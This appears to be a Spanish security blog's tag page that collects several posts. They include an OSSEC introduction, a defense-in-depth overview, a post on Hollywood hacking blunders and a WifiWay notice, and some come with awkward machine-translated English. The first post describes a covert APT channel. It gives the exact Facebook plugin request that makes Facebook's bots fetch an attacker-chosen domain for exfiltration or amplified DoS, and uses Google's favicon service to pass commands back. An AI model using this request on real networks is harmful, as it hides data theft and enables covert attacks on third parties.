The Information Systems and Computer Applications examination covers material that is usually taught in an introductory college-level business information systems course.

Posts tagged “security

APT: bot exfiltration

Dentro del mundo de las amenazas avanzadas persistentes o APTs, juegan un papel muy importante las técnicas utilizadas por los artefactos malware, para comunicarse y exfiltrar información a través de los C2s (Command & Control). En este aspecto existen tantas formas como imaginación pueda aportar el atacante y como protocolos y servicios existan. Un pequeño ejemplo de los “trucos” para enmascarar el tráfico ilegítimo como información aparentemente normal son:

  • Peticiones HTTP a páginas aparentemente lícitas, las cuales han sido crackeadas, albergando código del C2.
  • Sobreutilización del protocolo DNS para exfiltrar y comunicarse con los atacantes.
  • Sobreutilización de Google Calendar.

La lista anterior puede ser tan larga casi como campañas APT han existido y existen. En este post me gustaría aportar una nueva forma de exfiltración en la cual el equipo infectado y el C2 en ningún momento intercambian información directamente, sino que lo hacen a través de la legión de bots que los grandes gigantes de Internet disponen. Estos son Google, Facebook o Twitter entre otros.

¿Para qué sirven o qué función tienen estos bots? En el caso de Facebook, esta compañía dispone de una serie de agentes utilizados para realizar una previsualización del contenido de un enlace cuando se postea un comentario en esta red social. De esta manera, es posible presentar al usuario de una forma más amigable el contenido Web enlazado. Así, cuando el enlace es recibido por Facebook éste “ordena” a sus bots que visiten dicha URL extrayendo información de la web asociada.

El lector ya se habrá dado cuenta que controlando la URL a la cual queremos que los bots se conecten, disponemos de una forma de remitir información a un dominio propiedad del atacante, redirigiendo la petición a través de Facebook. De esta manera, ya tenemos el primer canal de comunicación “Equipo infectado” -> “C2”. Esta petición pasará totalmente desapercibida para los posibles analistas de seguridad del organismo víctima, ya que realmente son peticiones realizadas contra la red social.

El primer impedimento encontrado para ejecutar la redirección fue que necesitaba tener una cuenta de Facebook válida y estar autenticado para poder postear. Revisando un poco más a fondo por la documentación del “Caralibro” encontré la solución para poder postear sin estar autenticado. Esa magia la aportó la sección de “Developers”. A continuación, os dejo la petición GET para controlar los bots de Facebook a vuestro antojo, visitando todo aquello que vosotros les remitáis.

https://www.facebook.com/plugins/comments.php
?api_key=113869198637480
&channel_url=http://static.ak.fbcdn.net/connect/xd_proxy.php?version=3#cb=f10df33f48&
origin=http://developers.facebook.com/f29957fd8&relation=parent.parent&transport=postmessage
&href=DOMINIO A VISITAR
&locale=en_US
&numposts=2
&sdk=joey
&width=500

Un avispado ya se habrá dado cuenta que esto no sólo puede ser utilizado para exfiltrar información sino para por ejemplo realizar ataques de DoS encubiertos o aumentar contadores de visitas. Como ejemplo, os dejo el log de mi apache, tras decirle a Facebook que visite mi web.

66.220.152.118 - - [30/Oct/2014:11:44:23 +0100] "GET /kaka333333339 HTTP/1.1" 404 508 "-"
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-"
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_3.jpg HTTP/1.1" 206 1227
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
       (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-09.jpg HTTP/1.1" 206 654
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/spotlight.jpg HTTP/1.1" 206 2582
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_4.jpg HTTP/1.1" 206 1356
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome-18.jpg HTTP/1.1" 206 8889
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome.jpg HTTP/1.1" 206 3987
   "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.112 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-11.jpg HTTP/1.1" 206 654
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.117 - - [30/Oct/2014:11:45:17 +0100] "GET /images/services.jpg HTTP/1.1" 206 2794
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:44:23 +0100] "GET /kaka333333339 HTTP/1.1" 404 508 "-"
    "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-"
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_3.jpg HTTP/1.1" 206 1227
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
       (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-09.jpg HTTP/1.1" 206 654
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
       (+http://www.facebook.com/externalhit_uatext.php)"

La verdad es que se puede conseguir una buena amplificación, ya que una sola petición a Facebook generó 43 GETs de 10 bots distintos a la web destino. Pero no quiero desviarme del tema, que estamos a APTs.

Ahora que tenemos la forma de exfiltrar necesitamos poder remitir comandos de control a los equipos infectados en la organización víctima. Para esta parte nos van a ayudar los bots de Google, los cuales también podemos controlar para que no sólo visiten lo que nosotros queramos sino que además le remitan por nosotros a los equipos infectados las ordenes a realizar.
Normalmente cuando un C2 quiere ejecutar un comando en la víctima la comunicación no se hace en el sentido C2 -> “equipo infectado” sino al revés, siendo el portador del malware el que inicia comunicación.

Pues bien, Google dispone de una url por la que, dado un dominio, ésta te devuelve el favicon del mismo, lo que resulta perfecto para remitir en el mismo las órdenes a ejecutar en el equipo infectado.

http://www.google.com/s2/favicons?domain=DOMINIO-A-VISITAR

Una vez ejecutada, podemos ver en el log del C2 la siguiente petición realizada por el bot:

66.249.93.181 - - [31/Oct/2014:13:36:22 +0100] "GET / HTTP/1.1" 200 2961 "-"
   "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"
66.249.93.178 - - [31/Oct/2014:13:36:23 +0100] "GET /favicon.ico HTTP/1.1" 200 1703 "-"
   "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"

En este favicon podemos, por ejemplo con técnicas estenográficas, incluir la información de control remitida al equipo infectado. Así pues, tenemos establecida una comunicación bidireccional con los C2 sin establecer en ningún momento un canal directo entre equipos infectados y equipos de mando y control, perfecto para pasar desapercibidos.

Advertisements

OSSEC: Introducción by Alejandro Ramos

OSSEC es un Host IDS opensource que incluye características que lo convierten en una herramienta muy interesante para asegurar un sistema, ya sea de la familia Unix o Windows.
Nace como sistema de detención de intrusos basado en logs (LIDS o Log-based Intrusion Detection System)  pero en la actualidad ha evolucionado incluyendo otras funciones, entre ellas:
  • Control de integridad de ficheros: verifica que los ficheros relevantes del sistema no sean alterados de forma no gestionada.
  • Control de integridad del registro: igual al anterior, pero para claves del registro. De esta forma se puede monitorizar si se añade un nuevo servicio, y se conecta un dispositivo USB, si se agrega una aplicación para que arranque al inicio de windows, etcéterra.
  • Detección de rootkits: está basado en firmas y es un poco básico. No es tan completo como algunas soluciones específicas como unhiderkhunter o chkrootkit.
  • Respuesta activa: actuando como IPS, puede añadir reglas al firewall para bloquear hosts que generen eventos determinados.
Aunque la parte más relevante es el análisis y sistema de alertas basado en los logs, para los que dispone de decenas de decodificadores que los procesará con lógica.
Existen dos métodos de instalación, uno local, para un único servidor y otro con orientación cliente-servidor, donde los Agentes desplegados mandan las alertas a un servidor central con funciones de Manager.
El manager recibe y se comunica con los agentes mediante el puerto 1514/udp, por el que se transmiten los registros de forma cifrada (blowfish) y comprimida (zlib).

La aplicación se compone de varios servicios con distintas funciones cada uno de ellos y que serán usados según la configuración. Los más importantes son:

  • syscheckd: se encarga de ejecutar los análisis de integridad.
  • logcollector: recoge todos los logs del sistema, ya sean de syslog, ficheros planos, eventos de windows, etc.
  • agentd: envía los registros al manager remoto.
  • execd: ejecuta las respuestas activas (bloqueo de direcciones IP)
  • remoted: recibe los logs de los agentes remotos.
  • analysisd: proceso principal, se encarga de todo el análisis.
  • maild: manda correos electrónicos con las alertas.

La instalación por defecto se realiza en el directorio /var/ossec. Del que cuelga la configuración en el archivo/var/ossec/etc/ossec.conf.

Los decoders de cada uno de los logs se encuentran en formato XML en el directorio /var/ossec/rules/ y tienen el siguiente aspecto:

Las alertas se almacenan por defecto en /var/ossec/logs/alerts.log, aunque está desplegado un gran número de agentes, es recomendable guardarlas en base de datos. De la que podrán ser procesados con alguna de las consolas existentes.

 

Enhanced by Zemanta

El 77% de los usuarios ha perdido información por no realizar respaldos by André Goujon

Cada mes, los lectores comparten con nosotros tendencias y estadísticas relacionadas a diversos temas de Seguridad de la Información que planteamos a través de las encuestas que realizamos en ESET Latinoamérica. Durante octubre el tópico a tratar fue la pérdida de datos y el uso de respaldos o copias de seguridad. Aunque los códigos maliciosos […]

http://blogs.eset-la.com/laboratorio/2012/11/09/77-usuarios-perdido-informacion-no-realizar-respaldos/

Enhanced by Zemanta

Seguridad y Sostenibilidad

S2. Seguridad y Sostenibilidad

Cuando se habla de sostenibilidad parece que todos estamos de acuerdo en que el desarrollo de la Sociedad de la Información es la opción más adecuada para conseguir una economía productiva, competitiva y eficaz, por la vía del aumento de la productividad y la integración de la innovación como motor de la empresa. Todos damos por sentado que estos factores son necesarios para garantizar la sociedad del bienestar y por tanto la calidad de vida de los ciudadanos de los países desarrollados.

El propio desarrollo de la Sociedad de la Información debe ser sostenible en sí mismo para, a través suyo, poder garantizar la sostenibilidad de la sociedad en uso conjunto.

¿Cómo podemos definir una Sociedad de la Información sostenible? Teniendo en cuenta que:

  • Debe estar disponible
  • Debe ser confiable
  • Debe ser segura
  • Debe ser ubicua
  • Debe ser cómoda y accesible
  • Debe ser asequible
  • Debe regularse

Lo que no tiene sentido es que malhechores y sinvergüenzas de todo tipo campen a sus anchas por “La Sociedad de la Información”, nuestra sociedad virtual, haciendo el mal a diestro y siniestro. Tenemos que aprender a protegernos virtualmente, tenemos que proteger nuestros bienes virtuales, tenemos que desarrollar leyes y equipos profesionales especializados en garantizar un uso seguro de los servicios de la era de las comunicaciones. Necesitamos trabajar mucho para ello. Los profesionales, diseñando servicios que cumplan los principios anteriores. Los gobiernos, legislando para que la justicia pueda hacer su trabajo. Jueces y abogados, formándose para no quedarse boquiabiertos cuando presentamos ante sus narices un delito en la red y los ciudadanos preparándose para entender cómo funcionan sus nuevas vías de comunicación y para poder hacer frente a los granujas de la red que, hoy por hoy, disfrutan del anonimato que les proporciona su propia cobardía.

Nosotros, desde nuestro rincón en el mundo, estamos trabajando para crear una sociedad que entre de pleno derecho y sin miedo en la Sociedad de la Información, en la sociedad de las redes sociales en la sociedad más libre y democrática que puede existir. Desde estas líneas queremos anunciar nuestro compromiso continuado con una Sociedad Sostenible y Segura (Compromiso S2: Sostenibilidad y Seguridad), porque no entendemos una sociedad sostenible en la que la seguridad no esté presente en todas sus dimensiones.

Este compromiso los estamos materializando en proyectos de Responsabilidad Corporativa, de los que daremos cumplida información en cuanto nos sea posible, y en líneas de I+D+i para el desarrollo de nuevos servicios y productos.

Si alguno de nuestros lectores tiene alguna sugerencia en esta línea estaremos encantados de escucharla y, si es el caso, estudiarla.

Security and Sustainability

When talking about sustainability think we all agree that the development of Information Society is the best option to achieve a productive economy, competitive and efficient, by way of increased productivity and innovation integration as an engine of the company. All we assume that these factors are necessary to ensure the welfare society and therefore the quality of life of citizens in developed countries.

The very development of the Information Society must be sustainable in itself to, through you, to ensure the sustainability of society in common use.

How can we define a sustainable information society? Given that:

* Must be available
* Must be reliable
* Must be safe
* Must be ubiquitous
* Must be comfortable and accessible
* Must be affordable
* Should be regulated

What does not make sense is that criminals and crooks of all kinds roam freely with “The Information Society” virtual society, making the wrong right and left. We must learn to protect virtually, we must protect our virtual goods, we must develop laws and specialized professional teams to ensure the safe use of the services of the communication age. We need to work hard for it. Professionals, designing services that meet the above principles. Governments, legislating for justice to do its job. Judges and lawyers, formed not to remain speechless when presented with their noses a crime on the network and preparing citizens to understand how their new roads and to cope with the rascals of the network, today, enjoy the anonymity gives them their own cowardice.

We, from our corner of the world, we are working to create a society that between full and without fear in the Information Society, society of social networks in the free and democratic society can exist. From these lines we announce our continued commitment to a Sustainable Society and Safe (S2 Commitment: Sustainability and Security), we do not understand a sustainable society in which safety is not present in all its dimensions.

This commitment we are materializing in Corporate Responsibility projects, of which give full information as we can, and guidelines for ID i for the development of new services and products.

If any of our readers have any suggestions along these lines will be happy to listen and, if any, study.


from Security Art Work by Guillermo Mir

Las pifias de “Hollywood”

Hace ya varios años, cuando aún estaba estudiando en la facultad, me surgió la oportunidad de ejercer de moderador en una “asignatura” sobre las Ingenierías (y más concretamente, la informática) en el cine. Cada sesión se componía de dos partes: el visionado de una película y un debate posterior. Lo primero que tuve que hacer fue “documentarme” un poquillo, para decidir que películas podían ser interesantes, y que se podía sacar de ellas.

Esta claro que hoy en día no hace falta ver una película que hable de informática para ver el uso de ordenadores en ella, y se podría perdonar la falta de rigurosidad que estas pudieran tener. Lo triste es ver que en las películas en las que la informática forma parte de la trama principal, es las en las que más barbaridades se llegan a ver.

Realizando dicha labor, me encontré con varios blogs que hablaban de las grandes “pifias” que había cometido la industria cinematográfica con la informática. No recuerdo muy bien todos ellos, pero la mayoría estaba de acuerdo con qué películas habían cometido los mayores errores. Todos los blogs coinciden en que las películas que hablan de los hackers son aquellas que peor reflejan la realidad. Por ejemplo los “hackers” saben usar cualquier sistema operativo que además debe estar en suspensión o algo así, porque normalmente tienen una velocidad de arranque que ya quisiéramos, y son capaces de desproteger cualquier sistema en menos de 5 minutos. Un claro ejemplo de esta situación, llevada al límite de lo absurdo es cuando, en Operación Swordfish (Swordfish, 2001), Stanley (Hugh ‘Lobezno’ Jackman) tiene que demostrar que puede entrar en el ordenador del departamento de defensa americano en apenas un minuto, mientras una chica guapa se propone distraerle de una manera un tanto… original, y John “Vincent Vega” Travolta le apunta con una pistola en la sien. Como una imagen vale más que mil palabras os dejo un enlace al vídeo, juzgar vosotros mismos.

Otra capacidad que tienen los hackers es la de programar a toda velocidad. Lo más común son los virus (debe ser que son fáciles de hacer, hecho uno…). Véase por ejemplo Independence Day (Independence Day, 1996), en la que programan un virus capaz de desarmar los escudos de las naves alienígenas (¿os habéis planteado si usarán los Alien TCP/IP para sus comunicaciones?). No olvidéis tampoco que, si accedéis a http://www.fbi.org u otro organismo semejante, vais a la sección “secret files” y, con varios intentos accederéis a los datos más secretos del mundo. Aparte de las películas ya mencionadas, otras en las que aparecen “superhackers” son: The Italian Job (The Italian Job, 2003), Hackers (Hackers, 1995), Misión Imposible (Impossible Mission, 1996), Parque Jurásico (Jurassic Park, 1993)…

Una cosa sí hay que envidiar a los productores americanos: su capacidad de diseñar interfaces 3D “super chulas”, con una velocidad que ni Google. Los archivos que necesitas suelen estar escondidos detrás del cubo verde (otra vez Jurassic Park es un buen ejemplo de ello… ¡ah, y es Unix!), y no se puede acceder a ellos con un par de clicks, lo que hay que hacer es “aporrear” el teclado a toda velocidad para parecer que eres un gran informático. Son unos sistemas basados en la estadística: contra cuanto más rápido teclees, más posibilidades tienes de acertar la combinación de teclas necesarias para llegar al archivo. Eso sí, aunque son sistemas con una capacidad de búsqueda tremenda, tienen un punto flaco, y es a la hora de copiar archivos cruciales para resolver una trama de conspiración a nivel mundial, a un USB, un CD o mandarlos por correo. En ese momento la barra de progreso del copiado se vuelve “leeeeeeeeentaaaaaaaaaaaaaaa” dando tiempo así a que el malote aparezca por la puerta, para dar más tensión a la trama. Por nombrar alguna película más, que no deberíais ver ni aunque la vida os fuera en ello, Firewall (Firewall, 2006) dónde tito Harrison “Jones” Ford es un agente de seguridad, capaz de montar un escáner de última generación con la barra lectora de un fax/multifunción y con un iPod mini mediante la entrada de los cascos (llora McGyver), y sin saber como la cosa funciona de lujo, guardando los no se qué montonada de números de cuenta del banco y los almacena en el disco duro del iPod en forma de imágenes. No contento con esto, los pasa por un OCR y ya tenemos los números de cuenta perfectamente registrados en nuestro portátil… prefiero no hacer comentarios sobre esto.

Son numerosas las películas que, bien utilizados o no, usan al fin un programa real y conocido. El Nmap debe de ser el que se lleva la palma en apariciones cinematográficas, tanto, que sus desarrolladores muestran orgullosos en su página sus numerosas apariciones.

Son muchas las películas que probablemente me olvido de mencionar, pero quiero destacar La Jungla 4.0 (Live Free or Die Hard, 2007) (o cómo puedes salvar el mundo América con un teléfono móvil), en la que al final detectan la IP (supuestamente pública, ya que se está accediendo desde Internet) desde la que se está realizando un ataque, y está es del tipo 10.X.X.X, que como saben es de direccionamiento privado.

Probablemente sabréis de más películas que hablen del tema, bien o mal, pero por encima de todas ellas está una de las películas que más me marcó y no se si es la culpable de que me dedique a esto de las maquinitas, pero seguro que algo influyó. Si amigos, estoy hablando de Juegos de Guerra (War Games, 1983), que con sus virtudes y sus defectos, y a pesar de los años, sigue siendo una de las mejores películas que he visto sobre este tema. Es por eso que fue una de las elegidas para una de las sesiones, que me tocó moderar.

 

For several years, when he was studying in college, I got the chance to become the moderator in a “course” on Engineering (more specifically, computers) in the film. Each session consisted of two parts: the screening of a film and a subsequent discussion. The first thing I had to do was to “document” awhile, to decide which films could be interesting, and could be drawn from them.

It is clear that today do not need a movie to talk computer to see the use of computers in it, and could forgive the lack of rigor that they may have. The sad thing is to see that in movies where the computer is part of the plot, is the most terrible things in it ever see.

Doing this work, I found several blogs that talked about the big “gotcha” that had made the film industry with the computer. I do not remember very well all of them, but most agreed with what movies they had made the biggest mistakes. All blogs agree that the movies that speak of the worst hackers are those that reflect reality. For example, hackers know how to use any operating system must also be in suspension or something, because they usually have a speed boot and wanted, and are able to check out any system in less than 5 minutes. A clear example of this situation to the limit of absurdity is when, in Swordfish (Swordfish, 2001), Stanley (Hugh “Wolverine” Jackman) must demonstrate that the computer can enter the American defense department just a minute, while a pretty girl is proposed to distract from a somewhat original … and John “Vincent Vega” Travolta points a gun to his head. As a picture is worth a thousand words I leave a link to the video, judge for yourselves.

Another ability of hackers is to set it at full speed. The most common are viruses (must be that they are easy to make, made one …). See for example Independence Day (Independence Day, 1996), which scheduled a virus capable of disarming the shields of the alien ships (do you have questioned whether Allen used the TCP / IP for its communications?). Do not forget also that if accedéis to http://www.fbi.org or other similar body, going to the “secret files” and, with various attempts accederéis the secrets of the world data. Besides the aforementioned films, others on the displayed “superhackers are: The Italian Job (The Italian Job, 2003), Hacker (Hacker, 1995), Mission Impossible (Mission Impossible, 1996), Jurassic Park (Jurassic Park, 1993) …

One thing you have to envy the American producers: the ability to design 3D interfaces “super cool” with a speed that neither Google. The files you need are often hidden behind the green bin (again Jurassic Park is a good example of this … oh, and Unix!), And can not be accessed with a few clicks, you have to do is “bashing” the keyboard at full speed to seem like you’re a big computer. They are based on statistical systems: against the faster you type, the more chance you have of hitting the key combination needed to get the file. Yes, but are systems with tremendous search capabilities, have a weakness, and when copying files crucial to solve a web of global conspiracy, a USB, a CD or send by mail. At that time the copy progress bar becomes “leeeeeeeeentaaaaaaaaaaaaaaa” giving time to the smug and the door appears to give more tension to the plot. To name some more film, you should not see even if you life depended on it, Firewall (Firewall, 2006) where tito Harrison “Jones” Ford is a security officer, capable of mounting a last-generation scanner reading the bar a fax / multifunction and an iPod mini with the entry of helmets (cries McGyver), and without knowing how it works estate, saving is not what a quantity of bank account numbers and stored on the hard disk iPod in the form of images. Not content with this, goes through an OCR and we have the account number recorded on our laptop perfectly … I prefer not to comment on this.

There are many films that either used or not used at last a real program and known. The Nmap should be the one takes the cake on film appearances, therefore, that the developers take great pride in his numerous appearances page.

There are many films that I probably forgot to mention, but I want to highlight the Jungle 4.0 (Live Free or Die Hard, 2007) (or how America can save the world with a mobile phone), which detect the IP end (presumably public, as it is being accessed from the Internet) from which an attack is underway, and this is the type 10.xxx, as you know is a private address.

You probably know of more movies to talk about it, good or bad, but above all is one of the movies that influenced me and are not to blame if I dedicate this to the machines, but certainly something influenced. If friends, I’m talking WarGames (War Games, 1983), with its strengths and weaknesses, and despite the years, remains one of the best movies I’ve seen on this topic. That’s why it was one of those chosen for a session that touched me moderate.


Sentineldr

Defensa en Profundidad

Defensa en profundidad no es un concepto nuevo. Se refiere a una estrategia militar que tiene por objetivo hacer que el atacante pierda el empuje inicial y se vea detenido en sus intentos al requerirle superar varias barreras en lugar de una.

Al igual que un campo de batalla, nuestras infraestructuras de tecnología son una compleja formación de elementos que en conjunto albergan uno de los activos más valiosos para las empresas: los datos. Podemos visualizar esta infraestructura como una serie de capas donde los datos ocupan el último nivel, precedidos de contenedores como lo son las localidades físicas, el perímetro, la red, los servidores y las aplicaciones.

De esta forma, cada capa de nuestra infraestructura representa una barrera para el atacante en su camino hacia el objetivo final de acceder a los datos confidenciales, de manera que si falla cualquiera de los controles en una capa haya defensas adicionales que contengan la amenaza y minimicen las probabilidades de una brecha.


En adición, analizar nuestro ambiente de tecnología de esta forma para fines de integrar seguridad permite dividir el problema en partes más pequeñas y manejables, contribuyendo así a mejorar la calidad de su implementación.

A continuación algunas consideraciones importantes sobre las principales defensas de este modelo:

  • Políticas, procedimientos, concientización: Establecen el tono en toda la organización con relación a la protección de los activos de información, definen los objetivos y actividades de control y proveen un criterio de auditoría para el programa de seguridad. Para ser efectivas, las políticas deben ser debidamente comunicadas a todo el personal de la empresa. La concientización es clave debido a que es el personal quien maneja a diario los sistemas y las informaciones, por lo que sin su compromiso no es posible mantener la seguridad.
  • Firewall: La primera línea de defensa a nivel de la red la constituye por lo general el firewall, el cual analiza las conexiones entre redes y restringe el acceso de acuerdo a una política de seguridad. Aunque el rol del firewall ha ido cambiando y su función se ha combinado con otras anteriormente dispersas, el mismo sigue siendo un componente importante de nuestro arsenal de defensas siempre que sea correctamente gestionado. Esto incluye, entre otras acciones, mantenerlos actualizados, administrar las reglas de forma que implementen correctamente las políticas y auditar los eventos.
  • Sistemas de Detección / Prevención de Intrusos: Estos sistemas monitorean el tráfico de la red y alertan y/o previenen cualquier actividad sospechosa en tiempo real. El reto con estos sistemas es disminuir la cantidad de falsos positivos (actividad legítima que se detecta como maliciosa), así como monitorear los eventos de forma activa e implantar procesos adecuados de intervención.
  • NAC: Aunque una tecnología todavía emergente y de relativa poca adopción, el Control de Admisiones a Redes (NAC por sus siglas en inglés) permite inspeccionar los equipos que se conectan a las redes para determinar si los mismos cumplen con las políticas y estándares de seguridad, como por ejemplo contar con software antivirus y parches de seguridad requeridos. A partir de este resultado se puede permitir, restringir o negar el acceso del equipo así como generar alertas e incluso llevar a cabo la remediación correspondiente.
  • Antimalware: Las tecnologías antimalware (las cuales protegen de amenazas como los virus, troyanos, gusanos, botnets, spyware y otras formas de código malicioso) continúan su evolución hacia sistemas más inteligentes, capaces de detectar las amenazas más sofisticadas y complejas sin depender principalmente de firmas estáticas. Estas por igual requieren ser gestionadas correctamente. Asegurar su correcta actualización y monitoreo son aspectos clave para mantener su efectividad.
  • Encriptación: Puede ser considerada la última línea de defensa bajo este modelo. Encriptar o cifrar los datos protege la confidencialidad de los mismos durante su almacenamiento o transmisión por las redes. De esta forma, aunque los demás controles sean comprometidos, los datos permanecen seguros pues no podrán ser leídos a menos que sean descifrados. La seguridad de este mecanismo depende del manejo adecuado de las llaves utilizadas para descifrar los datos, por lo que se debe prestar especial atención a este aspecto.
  • Seguridad Física: Aún tengamos las más estrictas medidas de seguridad lógica, esto no nos protegerá de un intruso que intente sabotear o causar algún daño físico a nuestros sistemas. Por esta razón debemos mantener controles de seguridad física adecuados, tales como CCTV, control de acceso físico, alarmas y vigilancia; particularmente en áreas sensibles como el centro de cómputos.

Finalmente, el involucramiento y compromiso de las distintas áreas de la empresa con los objetivos y actividades de seguridad es esencial para que se mantengan y mejoren a través del tiempo. Para tales fines es necesario promover los beneficios en términos de reducción de riesgos, protección de la imagen, continuidad comercial, cumplimiento regulatorio, entre otros.

Fuente: Sentineldr


Seguridad Informatica

1:00 PM (1 hour ago)WifiWay 2.0.1 from Noticias de Seguridad Informática

 (www.segu-info.com.ar)

WifiWay es una distribución LIVE CD para la auditoria de redes inalambricas, creada por los mismos autores de la famosa distribución Wifislax y que esta cogiendo mucha fuerza por su rapidez y eficiencia a la hora de realizar un trabajo de auditoria inalambrica.

Wifiway esta basado en SLAX y cuenta con 2 versiones, una completa con todos los paquetes que mencionamos abajo y otra versión reducida para equipo menos potentes, que incluye todo lo de la completa pero sin kdeoffice, java-spoonwep, modulo firefox y modulo devel de compilación con las fuentes bases del kernel.
Incluye herramientas de auditoria wireless y además es el único que incorpora el software wlan4xx y su asociación con airoscript, ya que este programa es un desarrollo propio que permite calcular la clave por defecto de algunos routers del mercado.

WifiWay 2.0.1 COMPLETA (408MB) – a9d30a4b1d6f6ae677d895a1da619ac3
WifiWay 2.0.1 REDUCIDO (285MB) – 07e65813771354fcfcd1cf23d79c00ce

Fuente: DragonJAR